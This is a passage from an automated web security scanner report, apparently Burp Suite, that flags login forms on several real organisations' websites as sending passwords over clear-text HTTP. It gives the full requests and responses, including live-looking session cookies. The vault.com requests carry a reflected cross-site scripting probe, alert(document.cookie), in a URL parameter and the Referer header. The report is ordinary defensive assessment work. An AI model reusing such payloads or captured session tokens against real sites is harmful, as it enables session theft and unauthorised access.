Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A31%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D512%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:49:31 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
</p>

<form id="insitesearch" name="loginOptIn" action="/index.cfm?fuseaction=optin.actLogin&site_id=220" method="post">
<div class="clearfix">
...[SNIP]...
</label>
   <input name="loginPwd" id="password" type="password" onfocus="$(this).value='';" />
</p>
...[SNIP]...

5.7. http://www.fulbright.com/index.cfm  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /index.cfm HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFCLIENT_WWW2=recentsearch%3D%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:35 GMT;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A35%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D6%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:35 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
</p>

<form id="insitesearch" name="loginOptIn" action="/index.cfm?fuseaction=optin.actLogin&site_id=220" method="post">
<div class="clearfix">
...[SNIP]...
</label>
   <input name="loginPwd" id="password" type="password" onfocus="$(this).value='';" />
</p>
...[SNIP]...

5.8. http://www.fulbright.com/insite  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /insite

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /insite HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A52%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D157%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:52 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...
<br />
   <form id="insitesearch" name="OptInRegister" action="/index.cfm?fuseaction=optin.actLogin&site_id=1199" method="post">
<label for="username">
...[SNIP]...
<br />
<input name="loginPwd" id="password" type="password" onfocus="$(this).value='';" />
<br />
...[SNIP]...

5.9. http://www.fulbright.com/insite  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /insite

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /insite HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A52%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D157%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:52 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...
<br />
   <form id="loginOptIn" name="loginOptIn" action="/index.cfm?fuseaction=optin.actLogin&site_id=1199" method="post">

<label for="username">
...[SNIP]...
<br />
<input name="loginPwd" id="password" type="password" onfocus="$(this).value='';" />
<br />
...[SNIP]...

5.10. http://www.local.com/results.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /results.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 72932
Date: Wed, 19 Jan 2011 16:52:16 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=ttvxzdezqtxibt55l2f5dv45; path=/; HttpOnly
Set-Cookie: localcom=cid=710&loc=Dallas%2c+TX&kw=none&uid=7504aafd-2c5e-48d0-90d2-473f5c5bc81d&expdate=634336159361775734&bc=Results+for+none+in+Dallas%2c+TX|serp|%2fresults.aspx&rs=none|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Fri, 18-Feb-2011 16:52:16 GMT; path=/
Content-Length: 72932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX none | Find none i
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.11. http://www.political.cov.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.political.cov.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.political.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 16:55:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=18273037;expires=Fri, 11-Jan-2041 16:55:51 GMT;path=/
Set-Cookie: CFTOKEN=87095538;expires=Fri, 11-Jan-2041 16:55:51 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   <title>Covington Political Broadcasting Law</title
...[SNIP]...
<div id="right_col_login_area">
                   Member Login
                   <form action="/login.cfm" method="POST" style="margin-top:7px; margin-bottom:0px;">
                       <div style="padding-bottom: 5px;">
...[SNIP]...
</div>
                                   <input type="password" class="small_text_box" name="password" maxlength="12" /></td>
...[SNIP]...

5.12. http://www.skadden.com/alumni/Index.cfm  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.skadden.com
Path:   /alumni/Index.cfm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /alumni/Index.cfm HTTP/1.1
Host: www.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ALSITETOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/
Set-Cookie: ALUSERTOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/
Content-Type: text/html; charset=UTF-8


                                                           <!DOCTYPE html PUBLIC "-//W3C//Dtd Xhtml 1.0 Strict//EN" "http://w
...[SNIP]...
<td align="left" valign="top">
<form method="post" action="alumni_authenticate.cfm" id="loginFrm">

   <!--table-->
...[SNIP]...
<td valign="top" style="padding-bottom:6px;"><input class="formLogin" type="password" name="aPassword" maxlength="75" onkeypress="checkEnterAlumni(event)" /></td>
...[SNIP]...

5.13. http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/?mode=&redirecturl=%2fwps%2fmyportal%2fusa%2frankingsf6c40'%3balert(document.cookie)%2f%2fdba4d06d54c%2findividual HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.4.8.1295451341966; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:36:09 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI1djc6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3V76Uek5-Ukge5z0w0GW4zcMJG-AAzga6Pt55Oem6kfqR5njtNTLTD9EP9JFvyA3oio1O80l0FFREQAkitFr/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:38:13 GMT;path=/
Content-Length: 37405


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date
...[SNIP]...
</div>


<form id="mainLoginForm" name="mainLoginForm" action="/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI1djc6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3V76Uek5-Ukge5z0w0GW4zcMJG-AAzga6Pt55Oem6kfqR5njtNTLTD9EP9JFvyA3oio1O80l0FFREQAkitFr/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS9SQVM4ZjQ4NzUwMDAzLzI3MDg4MS9saQ!!/" method="POST">
                   <div class="lightbox_text2">
...[SNIP]...
</label>
<input type="password" name="password" id="password" value="" />
                       <br />
...[SNIP]...

5.14. http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/?mode=&redirecturl=%2fwps%2fmyportal%2fusa%2frankingsf6c40'%3balert(document.cookie)%2f%2fdba4d06d54c%2findividual HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.4.8.1295451341966; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:36:09 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI1djc6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3V76Uek5-Ukge5z0w0GW4zcMJG-AAzga6Pt55Oem6kfqR5njtNTLTD9EP9JFvyA3oio1O80l0FFREQAkitFr/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:38:13 GMT;path=/
Content-Length: 37405


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date
...[SNIP]...
</div>

<form method="post" action="/wps/portal/usa/membership">
                   
                   <input type="hidden" name="lastPage" value="/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWk
...[SNIP]...
</label>
                       <input id="UserPassword" name="UserPassword" type="password" value="" onfocus="this.value=''" />
                       <br clear="all" />
...[SNIP]...
</label>
                       <input id="UserConfirm" name="UserConfirm" type="password" value="" onfocus="this.value=''" />
                       <label for="zip-code">
...[SNIP]...

5.15. http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/?mode=&redirecturl=%2fwps%2fmyportal%2fusa%2frankingsf6c40'%3balert(document.cookie)%2f%2fdba4d06d54c%2findividual HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.4.8.1295451341966; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:36:09 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI1djc6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3V76Uek5-Ukge5z0w0GW4zcMJG-AAzga6Pt55Oem6kfqR5njtNTLTD9EP9JFvyA3oio1O80l0FFREQAkitFr/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:38:13 GMT;path=/
Content-Length: 37405


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date
...[SNIP]...
</div>

<form method="post" action="/wps/portal/usa/membership">

                   <input type="hidden" name="lastPage" value="/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlV
...[SNIP]...
</label>
                       <input id="UserPassword" name="UserPassword" type="password" value="" onfocus="this.value=''" />
                       <br clear="all" />
...[SNIP]...
</label>
                       <input id="UserConfirm" name="UserConfirm" type="password" value="" onfocus="this.value=''" />
                       <label for="zip-code">
...[SNIP]...

5.16. http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/?mode=&redirecturl=%2fwps%2fmyportal%2fusa%2frankingsf6c40'%3balert(document.cookie)%2f%2fdba4d06d54c%2findividual HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.4.8.1295451341966; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:36:09 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI1djc6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3V76Uek5-Ukge5z0w0GW4zcMJG-AAzga6Pt55Oem6kfqR5njtNTLTD9EP9JFvyA3oio1O80l0FFREQAkitFr/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:38:13 GMT;path=/
Content-Length: 37405


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date
...[SNIP]...
</div>
           <form name="loginForm" action="/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI1djc6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3V76Uek5-Ukge5z0w0GW4zcMJG-AAzga6Pt55Oem6kfqR5njtNTLTD9EP9JFvyA3oio1O80l0FFREQAkitFr/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS9wTjJDeTcyMDgwMDAxLzI3MDg3OC9saQ!!/" method="POST" onsubmit="return validateForm();">
               <div id="error-message-login" class="error">
...[SNIP]...
</label>
    <input type="password" id="login_password" name="password" />
   
    <br class="clear" />
...[SNIP]...

5.17. http://www.vault.com/wps/portal/usa/rankings/individual  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

